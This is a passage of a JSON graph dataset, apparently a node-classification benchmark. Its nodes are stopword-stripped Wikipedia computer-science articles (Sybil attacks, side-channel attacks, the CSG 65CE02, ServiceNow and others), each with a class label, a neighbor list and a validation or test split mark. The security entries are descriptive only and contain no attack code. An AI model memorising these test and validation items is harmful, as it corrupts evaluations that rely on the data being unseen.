      5550,
      5808,
      10418,
      9397,
      9527,
      3768,
      3004,
      1341,
      9661,
      9663,
      4416,
      2369,
      5441,
      9411,
      11457,
      8261,
      8518,
      72,
      2512,
      853,
      2901,
      4055,
      9942,
      9177,
      987,
      860,
      479,
      9183,
      11362,
      9828,
      10471,
      8808,
      6383,
      2544,
      244,
      9079,
      5880,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 4377,
    "label": 7,
    "text": "Native_cloud_application:native cloud application native cloud application nca type computer software natively utilizes services infrastructure cloud computing providers amazon ec2 force.com microsoft azure ncas exhibit combined usage three fundamental technologies",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      405,
      2965,
      2328,
      10265,
      8986,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      11343,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4378,
    "label": 8,
    "text": "SWFAddress:swfaddress swfaddress open-source javascript library enables adobe flash/flex javascript/ajax websites web applications support deep linking practice enables users link specific section page content importance rich internet application platforms provide single url access specific content user navigation within content uniquely identified shared means url developer content integrates swfaddress users able use standard browser navigation functionality share bookmark unique urls represent currently displayed section state content library commonly used flash websites web applications available deep linking javascript library flash web swfaddress found used 100,000 websites 2011 swfaddress uses hash portion url interact web browsers simulate page navigation works two ways library built integrate free google analytics web analytics system order record page view statistics track popularity individual pages viewer navigates virtual pages states content also integrates popular swfobject javascript library automatically enable deep linking content loaded swfaddress works major web browsers major operating systems integrated flash content written outdated actionscript 1 recent actionscript 2 latest actionscript 3",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      8071,
      10507,
      5524,
      8854,
      1944,
      8605,
      7455,
      6576,
      3761,
      11060,
      438,
      5311,
      2880,
      7871,
      9152,
      4292,
      4171,
      11087,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      9579,
      10991,
      10097,
      2804,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4379,
    "label": 4,
    "text": "Verinice:verinice verinice free open source information security management system isms application help creating maintaining systems information security management verinice written maintained primarily german company named sernet service network gmbh verinice licensed gnu general public license version 3 later main users usually small medium companies big enterprises government agencies germany verinice recommended verinice supports operating systems windows linux os x licensed baseline protection catalogs federal office information security",
    "neighbors": [
      10600,
      5353,
      5612,
      5677,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4380,
    "label": 4,
    "text": "Sybil_attack:sybil attack sybil attack attacker subverts reputation system peer-to-peer network creating large number pseudonymous identities uses gain disproportionately large influence named subject book sybil case study woman diagnosed dissociative identity disorder name suggested 2002 brian zill microsoft research term pseudospoofing previously coined l. detweiler cypherpunks mailing list used literature peer-to-peer systems class attacks prior 2002 term gain much influence sybil attack sybil attack computer security attack wherein reputation system subverted forging identities peer-to-peer networks reputation system vulnerability sybil attack depends cheaply identities generated degree reputation system accepts inputs entities chain trust linking trusted entity whether reputation system treats entities identically evidence showed large-scale sybil attacks could carried cheap efficient way extant realistic systems bittorrent mainline dht entity peer-to-peer network piece software access local resources entity advertises peer-to-peer network presenting identity one identity correspond single entity words mapping identities entities many one entities peer-to-peer networks use multiple identities purposes redundancy resource sharing reliability integrity peer-to-peer networks identity used abstraction remote entity aware identities without necessarily knowing correspondence identities local entities default distinct identity usually assumed correspond distinct local entity reality many identities may correspond local entity adversary may present multiple identities peer-to-peer network order appear function multiple distinct nodes adversary may thus able acquire disproportionate level control network affecting voting outcomes context human online communities multiple identities sometimes known sockpuppets notable sybil attack conjunction traffic confirmation attack launched tor anonymity network several months 2014 unknown perpetrators validation techniques used prevent sybil attacks dismiss masquerading hostile entities local entity may accept remote identity based central authority ensures one-to-one correspondence identity entity may even provide reverse lookup identity may validated either directly indirectly direct validation local entity queries central authority validate remote identities indirect validation local entity relies already accepted identities turn vouch validity remote identity question identity-based validation techniques generally provide accountability expense anonymity undesirable tradeoff especially online forums wish permit censorship-free information exchange open discussion sensitive topics validation authority attempt preserve users anonymity refusing perform reverse lookups approach makes validation authority prime target attack alternatively authority use mechanism knowledge user real identity verification unidentified person physical presence particular place time enforce one-to-one correspondence online identities real-world users sybil prevention techniques based connectivity characteristics social graphs also limit extent damage caused given sybil attacker preserving anonymity though techniques prevent sybil attacks entirely may vulnerable widespread small-scale sybil attacks examples prevention techniques sybilguard advogato trust metric also sparsity based metric identify sybil clusters distributed p2p based reputation system alternatively proof work used make sybil attacks expensive i2p implementation kademlia modified mitigate kademlia vulnerabilities sybil attacks",
    "neighbors": [
      2609,
      10741,
      11612,
      2558,
      7231
    ],
    "mask": "Test"
  },
  {
    "node_id": 4381,
    "label": 0,
    "text": "Articulatory_speech_recognition:articulatory speech recognition articulatory speech recognition means recovery speech forms phonemes syllables words acoustic signals help articulatory modeling extra input articulatory movement data speech recognition automatic speech recognition acoustic speech recognition means recovery speech acoustics sound wave articulatory information extremely helpful acoustic input low quality perhaps noise missing data",
    "neighbors": [
      5648,
      1890,
      10557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4382,
    "label": 4,
    "text": "Invincea:invincea invincea suite endpoint protection products formerly sold sophos invincea inc. originally secure command llc venture backed software company provided malware threat detection prevention pre-breach forensic intelligence acquired sophos 2017 sophos ended immediate end sale invincea products april 2018 founded 2006 anup ghosh company headquartered fairfax virginia major investors include dell ventures new atlantic ventures grotech ventures aeris capital harbert venture partners 2012 invincea used 21 million grant darpa improve security us military android-based devices tablet pcs smart phones invincea software secures data unauthorized access protects device malicious applications june 2013 dell announced oem partnership invincea began shipping new endpoint security solution dubbed “ dell data protection protected workspace ” commercial tablets pcs worldwide december 2013 invincea acquired sandboxie undisclosed amount sandboxie pioneer windows containment sandboxing market making logical addition invincea ’ technology portfolio may 2016 invincea launched x invincea x protects endpoints detecting blocking known unknown malware—without signatures real-time x combines deep learning advanced form machine learning behavioral analysis isolation technology one lightweight agent february 2017 invincea acquired sophos security software hardware company august year subsidiary invincea labs renamed two six labs january 2018 sophos announced invincea would integrated intercept x end-point security product april 16 2018 announced immediate end sale invincea-branded products support maintenance available existing contracts december 31st 2019 point support maintenance invincea products cease april 16 2018 sophos announced would longer selling invincea-related products although would continue support existing sales end 2019",
    "neighbors": [
      1994,
      1400,
      3484,
      2558,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 4383,
    "label": 2,
    "text": "OpenEZX:openezx openezx project tries gather information linux based motorola ezx phone platform tries provide 100 free software stack phones especially way avoid proprietary filesystem and/or device drivers also aims provide current 2.6.x kernel required hardware support ezx phones currently supported phones",
    "neighbors": [
      6276,
      11271,
      4364,
      3089,
      10393,
      6301,
      5406,
      673,
      3626,
      7727,
      3248,
      7857,
      823,
      7991,
      9784,
      1083,
      5824,
      7492,
      11079,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      3162,
      607,
      10080,
      2658,
      8423,
      10215,
      3561,
      10599,
      6763,
      6508,
      2925,
      495,
      1524,
      5369,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 4384,
    "label": 2,
    "text": "Windows_Workflow_Foundation:windows workflow foundation windows workflow foundation wf microsoft technology provides api in-process workflow engine rehostable designer implement long-running processes workflows within .net applications current version wf released part .net framework version 4.5 referred wf45 workflow defined series distinct programming steps phases step modeled wf activity .net framework provides library activities writeline activity writes text console form output custom activities also developed additional functionality activities assembled visually workflows using workflow designer design surface runs within visual studio designer also hosted applications encapsulating programming functionality activities allows developer create manageable applications component execution developed common language runtime object whose execution managed workflow runtime windows workflow foundation used create applications execute ordered business process steps needed approve document hire candidate position make purchase processes execute short amount time typically long-running application need shut conserve memory steps typically business processes modeled workflows following features workflows created either defined xaml extensible application markup language using workflow designer assembled programmatically .net language c vb.net designer used activities assembled workflow designer canvas dragging toolbox workflow arguments variables also created assigned within designer workflow assembled code activities instantiated like clr objects assembled collections single parent activity usually sequence flowchart single parent activity executed using workflowapplication workflowinvoker runs workflow term workflow usually refers root activity executed host workflows use out-of-box activities custom activities out-of-box activities include flow control activities dowhile flowchart-related activities flowdecision wcf messaging activities send primitive activities perform simple tasks like assign writeline custom activities user-created clr objects derive class system.activitiesactivity provide declarative functionality allowing developer define execution behavior activity code custom activities benefit custom activity designer associated enhance visual authoring experience visual studio ide",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      3821,
      10991,
      2804,
      4853,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      315,
      5952,
      1347,
      1348,
      844,
      847,
      1366,
      10079,
      11616,
      2401,
      2943,
      10624,
      9609,
      9612,
      7064,
      9114,
      3997,
      10654,
      8607,
      11683,
      4010,
      10157,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 4385,
    "label": 3,
    "text": "CSG_65CE02:csg 65ce02 csg 65ce02 8/16-bit microprocessor developed commodore semiconductor group 1988 member mos technology 6502 family developed cmos wdc 65c02 released western design center 1983 65ce02 built 2 µm cmos process instead original 6502 8 µm nmos technology making chip smaller thus less expensive well using much less power addition changes made 65c02 65ce02 also included improvements processor pipeline allow one-byte instructions complete 1 cycle rather 6502 variants minimum 2 cycles also removed 1 cycle delays crossing page boundaries changes improved performance much 25 clock speed changes included addition third index register z along addition modification number instructions use register zero-page first 256 bytes memory used pseudo-registers could moved page main memory using b ase page register stack register widened 8 16-bits using similar page register sph stack pointer high allowing stack moved page one grow larger sizes 65ce02 basis system chip csg 4501 developed unreleased commodore 65 65ce02 later used a2232 serial port card amiga computer appears seen use original 6502 designed era microcomputers existed microprocessors used basis simpler systems like smart terminals desktop calculators many different industrial controller systems also era memory devices generally based static ram expensive low memory density reasons ability handle large amounts memory required many processors operating modes worked small portions larger address space order offer higher performance case 6502 used first memory page zero page provide faster access second page page one hold 256-byte stack late 1970s original mos technology team designed 6502 broken bill mensch moved arizona set western design center wdc provide 6502-based design services around 1981 main licensees 6502 design rockwell semiconductor gte signetics began redesign effort mensch led wdc 65c02 mainly cmos implementation original nmos 6502 used 10 20 times less power also included number new instructions help improve code density certain applications new instructions included codice_1 increment decrement accumulator codice_2 write zero memory location codice_3 jump branch-style 1-byte relative address 65c02 also fixed number minor bugs original 6502 design 65ce02 improved version 65c02 expands memory model make suitable system large amounts main memory adds 8-bit b register base page offsets zero page location memory b set zero power-up reset initially works exactly like 6502 however value placed b register using codice_4 transfer b zero page moves new location significant use feature allow small routines fit within 256 bytes page use zero-page addressing known base page addressing makes code smaller addresses longer second byte also makes code run faster second byte fetched memory 65ce02 also extends stack original 256-bytes page one theory entire address space adding another 8-bit register like b register sph stack pointer high normally works like b offsetting base address stack page one selected page otherwise continues work maximum size one page 256 bytes like b startup reset sph set 01 works exactly like 65c02 however new stack extend bit status register set using new codice_5 instructions stack pointer becomes true 16-bit value value register added value original sp known spl stack pointer low produce 16-bit pointer bottom stack unlike b register however sph used stack extend bit status register set cleared startup reset using bit allows pipeline avoid construct full 16-bit address needed saving cycles stack accesses mode explicitly set using new codice_5 instructions clear set flag 65ce02 also adds new index register z set zero startup reset meaning store-z-to-memory instruction codice_2 works like 65c02 instruction means store-zero-to-memory allows unmodified 65c02 code run 65ce02 number instructions added modified allow access z register among codice_8 load value memory codice_9 transfer value accumulator codice_10 push pull z stack codice_11 increment decrement codice_12 compare value z value memory 65c02 added codice_3 branch always essentially codice_14 used branch-style 8-bit relative address instead absolute 16-bit address could simulated original 6502 using codice_15 branch overflow clear reasons almost always clear 6502 longer true 65c02 certain operations correctly set flag unknown reasons 65ce02 changed mnemonic codice_16 also added codice_17 instruction branch subroutine uses relative addressing mode codice_18 jump subroutine addition added 16-bit addressing word relative existing branch instructions previously branches could move backward 128 locations forward 127 based signed 8-bit value relative address 65ce02 could -32768 +32767 locations following branch 16-bit value previously perform long branch one normally use codice_14 branch n't want instance one wanted branch address 1234 accumulator zero one would codice_20 meaning want skip 3-byte codice_14 accumulator zero 65ce02 reduced something like codice_22 thereby making code obvious removing two bytes instructions removing need lost cycles fetching running branch however still uses relative addressing relative address calculated programmer assembler another addition system number word instructions carried operations 16-bit data included codice_23 increment decrement value memory codice_24 perform arithmetic shift left word rotate left word finally minor changes include addition codice_25 bit-shift right 6502 left shift codice_26 instruction performs two complement negation accumulator codice_27 variation codice_28 return subroutine returns address offset stack instead top avoiding need explicitly codice_29 anything routine added ran system also added new addressing mode used base address stack basis indirect addressing major oddity original 6502 one-byte instructions like codice_30 still took two cycles complete allowed simplifications pipeline system next byte memory fetched operation decoded meaning next byte fetched matter instructions byte would part whole operand could fed now-decoded instruction instruction required one byte processor read following byte next instruction however way feed back first stage pipeline decode case fetched byte discarded re-read feed decoder wastes cycle although led number instructions slower could feature retained 65c02 although whether order retain pipeline simplicity cycle timing explained available sources maintaining cycle compatibility requirement 65ce02 new fabrication processes made extra circuitry pipeline non-issue pipeline re-arranged correctly handle one-byte instructions result 65ce02 recover faster engagement sync signal reduces minimum instruction execution time 2 cycles 1 cycle improvements allow 65ce02 execute code 25 faster previous 65xx models fabricated using 2 µm cmos technology allowing lower power operation compared previous nmos hmos versions 65xx family housed 40-pin dip pin compatible 6502 4510 system package sip variant 65ce02 includes two 6526 cia i/o port controllers custom mmu expand address space 20 bit 1 megabyte housed 84-pin plcc 4510 used unreleased commodore 65 home computer unreleased commodore cdtv cost-reduced revision 65ce02 used commodore a2232 serial port card amiga computer",
    "neighbors": [
      11395,
      1029,
      10767,
      7188,
      664,
      8352,
      10784,
      6821,
      7589,
      3630,
      11054,
      5040,
      7858,
      8501,
      2874,
      3010,
      3157,
      6485,
      10969,
      602,
      5598,
      5862,
      5736,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284
    ],
    "mask": "None"
  },
  {
    "node_id": 4386,
    "label": 3,
    "text": "MCST-R1000:mcst-r1000 mcst r1000 64-bit microprocessor developed moscow center sparc technologies mcst fabricated tsmc development microprocessor designated mcst-4r",
    "neighbors": [
      7234,
      6659,
      2503,
      7687,
      6957,
      5358,
      10734,
      1776,
      1425,
      499,
      1399,
      9976,
      2490,
      2523,
      11580,
      9309,
      6815
    ],
    "mask": "Test"
  },
  {
    "node_id": 4387,
    "label": 2,
    "text": "AHI_(Amiga):ahi amiga ahi ahi audio system retargetable audio subsystem amigaos morphos aros created martin blom mid-1990s allow standardized operating system support audio hardware native amiga sound chip example 16-bit sound cards ahi offers improved functionality available amigaos audio device driver seamless audio playback user selected audio device applications supported ahi standardized functionality audio recording efficient software mixing routines combining multiple sound channels thus overcoming four channel hardware limit original amiga chipset also incorporated unique mode produced 14-bit playback using amiga chipset combining two 8-bit channels set different volumes first official release ahi 1996 ahi became widely supported standard audio hardware audio software amiga systems officially included later operating system releases author stated referring software correct term 'ahi audio system 'ahi 'audio hardware interface term sometimes used press",
    "neighbors": [
      8832,
      9249,
      9762,
      10570,
      7983,
      5743,
      8369,
      8114,
      6995,
      8115,
      2197,
      9236,
      9848
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4388,
    "label": 7,
    "text": "ServiceNow:servicenow servicenow inc. service-now 2011 american cloud computing company headquarters santa clara california founded 2004 fred luddy servicenow listed new york stock exchange constituent russell 1000 index servicenow founded glidesoft inc. 2003 fred luddy previous cto software companies peregrine systems remedy corporation later incorporated california 2004 luddy previously served chief technology officer peregrine systems enterprise software company based san diego 2002 founding company luddy intended provide services previously available defunct peregrine systems mid-2005 luddy employee concentrated developing software company would offer came first hires five people raising venture financing jmi equity 2006 company changed name servicenow 2007 servicenow reported annual revenue opened first silicon valley office san jose 2007 also first year company went cash flow positive company 275 employees san diego chicago new york atlanta london frankfurt offices well partnership accenture 100 servicenow consultants time company known service-now april 2011 company named frank slootman chief executive officer june 2012 servicenow became publicly traded company following ipo shortly thereafter company relocated headquarters san diego santa clara california first technology company taken public morgan stanley since facebook october 2017 company acquired san diego human-centered design firm telepathy founded 2001 acquisition doubled size servicenow internal design agency design experience organization october 2017 servicenow acquired skygiraffe enterprise mobility platform consequently formed basis servicenow mobile platform offering released march 2019 skygiraffe founded boaz hecht itay braun 2012 headquartered california r israel april 2018 servicenow acquired vendorhawk software-as-service-management company may 2018 servicenow acquired parlo artificial intelligence natural language understanding workforce solution october 2018 servicenow acquired friendlydata company specializing form natural language processing enables queries asked plain language 2019 servicenow acquired appsee ltd. analytics startup helped developers understand users interact mobile apps servicenow software-as-a-service provider providing technical management support service management operations large corporations including providing help desk functionality company core business revolves around management incident problem change operational events fee model based cost per user seat per month cost ranging",
    "neighbors": [
      4194,
      7780,
      265,
      4042,
      3819,
      8170,
      8683,
      10090,
      911,
      1935,
      5295,
      7248,
      467,
      1907,
      10735,
      8921,
      10266,
      94
    ],
    "mask": "None"
  },
  {
    "node_id": 4389,
    "label": 4,
    "text": "Side-channel_attack:side-channel attack computer security side-channel attack attack based information gained implementation computer system rather weaknesses implemented algorithm e.g cryptanalysis software bugs timing information power consumption electromagnetic leaks even sound provide extra source information exploited side-channel attacks require technical knowledge internal operation system although others differential power analysis effective black-box attacks rise web 2.0 applications software-as-a-service also significantly raised possibility side-channel attacks web even transmissions web browser server encrypted e.g. https wifi encryption according researchers microsoft research indiana university many powerful side-channel attacks based statistical methods pioneered paul kocher attempts break cryptosystem deceiving coercing people legitimate access typically considered side-channel attacks see social engineering rubber-hose cryptanalysis general classes side channel attack include cases underlying principle physical effects caused operation cryptosystem side provide useful extra information secrets system example cryptographic key partial state information full partial plaintexts forth term cryptophthora secret degradation sometimes used express degradation secret key material resulting side-channel leakage works monitoring security critical operations aes t-table entry modular exponentiation multiplicand accesses attacker able recover secret key depending accesses made made victim deducing encryption key also unlike side-channel attacks method create fault ongoing cryptographic operation invisible victim 2017 cache-based vulnerabilities discovered cpus dubbed meltdown spectre allow attacker leak memory contents processes operating system timing attack watches data movement cpu memory hardware running cryptosystem algorithm simply observing variations long takes perform cryptographic operations might possible determine entire secret key attacks involve statistical analysis timing measurements demonstrated across networks power-analysis attack provide even detailed information observing power consumption hardware device cpu cryptographic circuit attacks roughly categorized simple power analysis spa differential power analysis dpa fluctuations current also generate radio waves enabling attacks analyze measurements electromagnetic emanations attacks typically involve similar statistical techniques power-analysis attacks historical analogues modern side-channel attacks known recently declassified nsa document reveals far back 1943 engineer bell telephone observed decipherable spikes oscilloscope associated decrypted output certain encrypting teletype according former mi5 officer peter wright british security service analyzed emissions french cipher equipment 1960s 1980s soviet eavesdroppers suspected planted bugs inside ibm selectric typewriters monitor electrical noise generated type ball rotated pitched strike paper characteristics signals could determine key pressed power consumption devices causes heating offset cooling effects temperature changes create thermally induced mechanical stress stress create low level acoustic emissions operating cpus 10 khz cases recent research shamir et al suggested information operation cryptosystems algorithms obtained way well acoustic cryptanalysis attack surface cpu chip cases cpu package observed infrared images also provide information code executed cpu known thermal-imaging attack optical side-channel attack examples include gleaning information hard disk activity indicator reading small number photons emitted transistors change state side-channel attacks rely relationship information emitted leaked side channel secret data countermeasures fall two main categories 1 eliminate reduce release information 2 eliminate relationship leaked information secret data make leaked information unrelated rather uncorrelated secret data typically form randomization ciphertext transforms data way undone cryptographic operation e.g. decryption completed first category displays special shielding lessen electromagnetic emissions reducing susceptibility tempest attacks commercially available power line conditioning filtering help deter power-monitoring attacks although measures must used cautiously since even small correlations remain compromise security physical enclosures reduce risk surreptitious installation microphones counter acoustic attacks micro-monitoring devices cpu power-draw thermal-imaging attacks another countermeasure still first category jam emitted channel noise instance random delay added deter timing attacks although adversaries compensate delays averaging multiple measurements generally using measurements analysis amount noise side channel increases adversary needs collect measurements another countermeasure first category use security analysis software identify certain classes side channel attacks found design stages underlying hardware timing attacks cache attacks identifiable certain commercially available security analysis software platforms allow testing identify attack vulnerability well effectiveness architectural change circumvent vulnerability comprehensive method employ countermeasure create secure development lifecycle hardware includes utilizing available security analysis platforms respective stages hardware development lifecycle case timing attacks targets whose computation times quantized discrete clock cycle counts effective countermeasure design software isochronous run exactly constant amount time independently secret values makes timing attacks impossible countermeasures difficult implement practice since even individual instructions variable timing cpus one partial countermeasure simple power attacks differential power-analysis attacks design software pc-secure program counter security model pc-secure program execution path depend secret values words conditional branches depend public information even though multiply operations draw power nop practically cpus using constant execution path prevents operation-dependent power differences differences power choosing one branch another leaking secret information architectures instruction execution time data-dependent pc-secure program also immune timing attacks another way code non-isochronous modern cpus memory cache accessing infrequently used information incurs large timing penalty revealing information frequency use memory blocks cryptographic code designed resist cache attacks attempts use memory predictable fashion accessing input outputs program data according fixed pattern example data-dependent table lookups must avoided cache could reveal part lookup table accessed partial countermeasures attempt reduce amount information leaked data-dependent power differences operations use power correlated number 1 bits secret value using constant-weight code using fredkin gates dual-rail encoding reduce leakage information hamming weight secret value although exploitable correlations likely remain unless balancing perfect balanced design approximated software manipulating data complement together several secure cpus built asynchronous cpus global timing reference cpus intended make timing power attacks difficult subsequent research found timing variations asynchronous circuits harder remove typical example second category decorrelation technique known blinding case rsa decryption secret exponent formula_1 corresponding encryption exponent formula_2 modulus formula_3 technique applies follows simplicity modular reduction omitted formulas decrypting computing result formula_4 given ciphertext formula_5 system picks random number formula_6 encrypts public exponent formula_2 obtain formula_8 decryption done formula_9 obtain formula_10 since decrypting system chose formula_6 compute inverse modulo formula_3 cancel factor formula_6 result obtain formula_4 actual result decryption attacks require collecting side-channel information operations data controlled attacker blinding effective countermeasure since actual operation executed randomized version data attacker control even knowledge another general countermeasure effective side-channel attacks masking countermeasure principle masking avoid manipulating sensitive value formula_5 directly rather manipulate sharing set variables called shares formula_16 formula_17 formula_18 xor operation attacker must recover values shares get meaningful information",
    "neighbors": [
      1024,
      2050,
      5636,
      7556,
      2567,
      3084,
      2957,
      8333,
      10894,
      3984,
      7056,
      658,
      9233,
      660,
      1173,
      1941,
      3477,
      9214,
      9117,
      4128,
      10786,
      675,
      10662,
      169,
      6954,
      3629,
      7853,
      7601,
      11185,
      2357,
      10806,
      5176,
      9528,
      8379,
      7161,
      2110,
      11639,
      9541,
      7627,
      10315,
      10571,
      6863,
      8273,
      2514,
      7635,
      212,
      3924,
      9170,
      9556,
      10963,
      2265,
      11349,
      7643,
      9435,
      6494,
      8286,
      9697,
      8674,
      8292,
      229,
      7527,
      618,
      1898,
      8815,
      1776,
      881,
      7794,
      1140,
      1654,
      5110,
      6905,
      7034,
      892,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4390,
    "label": 6,
    "text": "XtreemFS:xtreemfs xtreemfs object-based distributed file system wide area networks xtreemfs outstanding feature full components real failure scenarios including network partitions fault tolerance maintaining posix file system semantics fault-tolerance achieved using paxos-based lease negotiation algorithms used replicate files metadata ssl x.509 certificates support make xtreemfs usable public networks xtreemfs development since early 2007 first public release made august 2008 xtreemfs 1.0 released august 2009 1.0 release includes support read-only replication failover data center replica maps parallel reads writes native windows client 1.1 added automatic on-close replication posix advisory locks mid-2011 release 1.3 added read/write replication files version 1.4 underwent extensive testing considered production-quality improved hadoop integration support ssds added version 1.5 xtreemfs funded european commission ist programme original xtreemfs team founded quobyte inc. 2013 quobyte offers professional storage system commercial product",
    "neighbors": [
      5956,
      3909,
      2314,
      7499,
      5677,
      6797,
      7983,
      823,
      728,
      2395,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 4391,
    "label": 8,
    "text": "Eagle_(application_server):eagle application server eagle web-based mainframe-powered application server provides direct secure high performance internet access mainframe computer data transactions using real-time transaction processing rather middleware external gateways originally based ibm 3270 environment developed university florida reduce delivery time student record applications engine configured web 1996 removed need screen scraping interface eagle provides direct network access mainframe data transactions web applications talk directly native mainframe resources without complexity expense middleware non-mainframe resources accessed via hooks customized communication programs using xml edi since eagle mainframe computer transaction application pages created internally delivered via web reduces overhead compared external call interfaces resulting considerable performance gains periods peak demand university florida eagle routinely handles 400,000 transactions per day maintaining sub-second response time web defined stateless environment—normally web page requested web page delivered interaction eagle associates pages user handles authentication authorization eagle session management engine protected behind mainframe security eagle awarded patent 6,532,463 state maintenance mechanism",
    "neighbors": [
      8122,
      479,
      119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4392,
    "label": 9,
    "text": "Philip_Wadler:philip wadler philip lee wadler born april 8 1956 american computer scientist known contributions programming language design type theory particular contributed theory behind functional programming use monads functional programming design purely functional language haskell xquery declarative query language 1984 created orwell programming language wadler involved adding generic types java 5.0 also author paper theorems free gave rise much research functional language optimization see also parametricity wadler received bachelor science degree mathematics stanford university 1977 master science degree computer science carnegie mellon university 1979 completed doctor philosophy computer science carnegie mellon university 1984 thesis entitled listlessness better laziness supervised nico habermann wadler research interests programming languages wadler research fellow programming research group part oxford university computing laboratory st cross college oxford 1983–87 progressively lecturer reader professor university glasgow 1987 1996 wadler member technical staff bell labs lucent technologies 1996–99 avaya labs 1999–2003 since 2003 professor theoretical computer science school informatics university edinburgh wadler editor journal functional programming 1990 2004 wadler currently working new functional language designed writing web applications called links supervised numerous doctoral students completion since 2003 wadler professor theoretical computer science laboratory foundations computer science university edinburgh chair theoretical computer science also member university blockchain technology laboratory h-index 70 24,447 citations google scholar wadler received influential popl paper award 2003 1993 popl symposium paper imperative functional programming jointly simon peyton jones 2005 elected fellow royal society edinburgh 2007 inducted acm fellow association computing machinery acm",
    "neighbors": [
      11141,
      10246,
      6536,
      1783,
      3475,
      9248,
      4769,
      3876,
      9895,
      4392,
      5677,
      4916,
      3263,
      8262,
      5585,
      219,
      8926,
      230,
      3823,
      10102,
      6775,
      8057,
      5885
    ],
    "mask": "None"
  },
  {
    "node_id": 4393,
    "label": 1,
    "text": "Associative_entity:associative entity associative entity term used relational entity–relationship theory relational database requires implementation base relation base table resolve many-to-many relationships base relation representing kind entity called informally associative table mentioned associative entities implemented database structure using associative tables tables contain references columns different database tables within database associative junction table maps two tables together referencing primary keys data table effect contains number foreign keys many-to-one relationship junction table individual data tables pk associative table typically composed fk columns associative tables colloquially known many names including association table bridge table cross-reference table crosswalk intermediary table intersection table join table junction table link table linking table many-to-many resolver map table mapping table pairing table pivot table used incorrectly laravel confused correct use pivot table spreadsheets transition table example practical use associative table would assign permissions users multiple users user assigned zero permissions individual permissions may granted one users select-statement junction table usually involves joining main table junction table return list users permissions inserting junction table involves multiple steps first inserting main table updating junction table using foreign keys database automatically dereference values userpermissions table tables",
    "neighbors": [
      11457,
      9286,
      8117,
      9397,
      347
    ],
    "mask": "Test"
  },
  {
    "node_id": 4394,
    "label": 3,
    "text": "Multiuser_DOS_Federation:multiuser dos federation multiuser dos federation mdos industry alliance promote growth acceptance multi-user dos-based solutions 286 386 486 computers formed july 1990 idea reduce costs allowing workgroups run dos applications shared pc working terminals workstations 18 february 1991 several members multiuser dos federation issued press release regarding intentions support dpmi mostly dpmi 1.0 products including alloy computer products inc. pc-plus bluebird systems inc. superdos concurrent controls inc. cci multiuser dos digital research inc. dr multiuser dos h computer systems inc. tsx-32 starpath systems inc. vmos/3 software link pc-mos/386 theos software corporation theos intelligent graphics corporation vm/386",
    "neighbors": [
      2201,
      2355,
      9525,
      8999
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4395,
    "label": 9,
    "text": "Rudolf_Berghammer:rudolf berghammer rudolf berghammer born 1952 oberndorf germany german mathematician works computer science rudolf berghammer worked electrician farbwerke hoechst kelheim 1966 1970 began studying mathematics computer science 1973 tu münchen academic teachers friedrich l. bauer klaus samelson gottfried tinhofer gunther schmidt obtaining diploma 1979 started working assistant mainly gunther schmidt friedrich l. bauer tu münchen obtained award-winning ph.d. 1984 1988 worked assistant gunther schmidt faculty computer science universität der bundeswehr münchen finally got habilitation 1990 since 1993 professor computer-aided program development department computer science university kiel many years served head steering committee international ramics conference series formerly termed relmics rudolf berghammer known work relational mathematics formal methods programming semantics relational methods computer science developed relview system manipulation visualisation relations relational programming instance 2019 coauthor cryptomorphic topological structures computational relation algebraic approach work relates classical neighborhood system approach topology closure operators kernel operators aumann contact relations formulation one approach another done calculus relations article notes contributions relview experiments finite topologies instance set seven elements 9,535,241 topologies tested see § 9 one hobbies mountaineering youth climbed ortler piz bernina noted summits active climber spending several days alps every year",
    "neighbors": [
      1392,
      5097,
      5496,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 4396,
    "label": 5,
